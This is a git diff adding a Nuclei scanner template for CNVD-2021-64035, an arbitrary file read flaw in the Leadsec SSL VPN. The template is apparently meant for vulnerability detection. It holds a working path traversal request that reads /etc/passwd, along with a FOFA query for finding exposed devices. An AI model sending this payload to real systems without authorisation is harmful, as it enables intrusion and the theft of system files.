diff --git a/http/cnvd/2024/CNVD-2021-64035.yaml b/http/cnvd/2024/CNVD-2021-64035.yaml new file mode 100644 index 0000000000..2f97ea6bd3 --- /dev/null +++ b/http/cnvd/2024/CNVD-2021-64035.yaml @@ -0,0 +1,38 @@ +id: CNVD-2021-64035 + +info: + name: Leadsec VPN - Arbitrary File Read + author: xiaoWangSec + severity: high + description: | + There is an information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., and attackers can use the vulnerability to obtain sensitive information. + reference: + - https://avd.aliyun.com/detail?id=AVD-2021-888761 + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035 + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-15980305" + tags: cnvd,cnvd2024,lfi,leadsec,vpn + +http: + - raw: + - | + GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "appframe" + + - type: status + status: + - 200